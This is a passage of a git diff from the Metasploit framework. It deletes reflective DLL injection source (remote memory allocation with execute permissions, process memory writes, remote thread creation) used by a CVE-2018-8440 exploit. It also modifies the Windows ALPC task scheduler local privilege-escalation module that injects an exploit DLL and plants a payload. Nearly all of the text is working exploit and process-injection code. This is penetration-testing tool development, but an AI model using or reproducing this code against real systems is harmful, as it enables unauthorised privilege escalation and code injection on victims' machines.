lpBuffer == NULL || dwLength == 0 ) - return NULL; - - __try - { - // check if the library has a ReflectiveLoader... - dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); - if( dwReflectiveLoaderOffset != 0 ) - { - pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset); - - // we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader... - // this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region - if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) ) - { - // call the librarys ReflectiveLoader... - pDllMain = (DLLMAIN)pReflectiveLoader(); - if( pDllMain != NULL ) - { - // call the loaded librarys DllMain to get its HMODULE - // Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only. - if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) ) - hResult = NULL; - } - // revert to the previous protection flags... - VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 ); - } - } - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - hResult = NULL; - } - - return hResult; -} -//===============================================================================================// -// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function -// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -// defined in order to use the correct RDI prototypes. -// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | -// PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ -// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space. -// Note: This function currently cant inject accross architectures, but only to architectures which are the -// same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64. -HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ) -{ - LPVOID lpRemoteLibraryBuffer = NULL; - LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL; - HANDLE hThread = NULL; - DWORD dwReflectiveLoaderOffset = 0; - DWORD dwThreadId = 0; - - __try - { - do - { - if( !hProcess || !lpBuffer || !dwLength ) - break; - - // check if the library has a ReflectiveLoader... - dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); - if( !dwReflectiveLoaderOffset ) - break; - - // alloc memory (RWX) in the host process for the image... - lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - if( !lpRemoteLibraryBuffer ) - break; - - // write the image into the host process... - if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) ) - break; - - // add the offset to ReflectiveLoader() to the remote library address... - lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset ); - - // create a remote thread in the host process to call the ReflectiveLoader! - hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId ); - - } while( 0 ); - - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - hThread = NULL; - } - - return hThread; -} -//===============================================================================================// diff --git a/external/source/exploits/CVE-2018-8440/inject/src/LoadLibraryR.h b/external/source/exploits/CVE-2018-8440/inject/src/LoadLibraryR.h deleted file mode 100755 index 5c44b02060..0000000000 --- a/external/source/exploits/CVE-2018-8440/inject/src/LoadLibraryR.h +++ /dev/null @@ -1,41 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H -#define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); - -HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ); - -HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ); - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/modules/exploits/windows/local/alpc_taskscheduler.rb b/modules/exploits/windows/local/alpc_taskscheduler.rb index 003079e06d..36104a823c 100644 --- a/modules/exploits/windows/local/alpc_taskscheduler.rb +++ b/modules/exploits/windows/local/alpc_taskscheduler.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Local 'SandboxEscaper', # Original discovery and PoC 'bwatters-r7', # msf module 'asoto-r7', # msf module - 'jrobles-r7' # msf module + 'Jacob Robles' # msf module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter','shell'], #TODO: syntax for shell? @@ -76,42 +76,44 @@ class MetasploitModule < Msf::Exploit::Local def setup super + @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) @payload_name = "#{payload_name}.dll" unless payload_name.match(/\.dll$/i) - @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') @payload_path = "#{temp_path}\\#{payload_name}" + @payload_dll = generate_payload_dll - @original_path = ('A' * 80) + '.dll' + @original_path = ('A' * 80) end - def overwrite_payload_path(exploit_data, payload_path, original_path) + def overwrite_payload_path(exploit_data) # The payload path is hard-coded into the exploit # We need to change it, but the exploit binary is in UTF-16LE # But our parsers (right now) expect it to be encoded as ANSI-8bit # Covert the exploit binary to UTF-16, switch the values, then return # the encoding to whatever it was to begin with print_status("Attempting to change the payload path to #{payload_path}...") - print_status("payload path length = #{payload_path.length}...") - print_status("original path length = #{original_path.length}...") + if payload_path.length > original_path.length fail_with(Failure::BadConfig,"Parameter PAYLOAD_NAME may not exceed #{original_path.length} characters, including extension") end + original_encoding = exploit_data.encoding - exploit_data.force_encoding("UTF-16LE") - padded_path = payload_path + ('x/00' * ((original_path.length)-(payload_path.length))) + padded_path = payload_path + ("\x00" * (original_path.length-payload_path.length)) + padded_path.encode!("UTF-16LE") original_path.encode!("UTF-16LE") exploit_data.force_encoding("UTF-16LE") + exploit_data.sub!(original_path, padded_path) exploit_data.force_encoding(original_encoding) end def inject_magic(process) - library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'reflective_dll.x64.dll') + library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll') library_path = ::File.expand_path(library_path) dll_data = '' ::File.open(library_path, 'rb') { |f| dll_data = f.read } - overwrite_payload_path(dll_data, payload_path, original_path) + overwrite_payload_path(dll_data) print_status("Reflectively injecting the exploit DLL into #{process.pid}...") exploit_mem, offset = inject_dll_data_into_process(process, dll_data) process.thread.create(exploit_mem + offset) @@ -155,10 +157,6 @@ class MetasploitModule < Msf::Exploit::Local end end - def ensure_clean_exploit_destination - ensure_clean_destination(exploit_path) - end - def ensure_clean_payload_destination ensure_clean_destination(payload_path) end